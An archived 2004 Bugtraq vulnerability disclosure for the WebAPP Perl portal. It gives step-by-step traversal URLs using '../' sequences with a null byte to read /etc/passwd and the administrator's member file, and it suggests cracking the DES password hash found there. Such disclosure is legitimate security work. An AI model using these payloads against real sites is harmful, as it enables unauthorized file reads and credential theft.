lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040824154251.21637.qmail@www.securityfocus.com>
Date: 24 Aug 2004 15:42:51 -0000
From: "Jérôme" ATHIAS <jerome.athias@...amail.com>
To: bugtraq@...urityfocus.com
Subject: WebAPP directory traversal and ability to retrieve the DES
    encrypted password hash





WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :

   -Easy to Install on standard Unix servers!
      (Windows user-supported only!)
   -User Profiles
   -Message forums
   -Private messaging between members
   -Blog-style News Articles
   -Links and Downloads
   -Customizable themes
   -Multiple language support
   -Flat-file System-NO SQL DATABASE!
   -Membership controls
   -Open source

Several user mods are also available which ranges from chat
to e-commerce applications.

Several vulnerabilities in these mods have already been
discovered. 



The WebAPP system itself has a serious reverse directory
traversal vulnerability.

Example..

1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/

2) Click on Articles on the main menu at the left side of
the screen

3) Click on any of the icons representing the misc topics
available   /i chose the "bugs" section/

4) You'll wind up with the url "http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs"
on the address bar on your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"

5)View the html source for the page



A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"

View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&amp;id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it

Every user would have a corresponding .dat file within the
db/members directory


PhTeam Release

Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ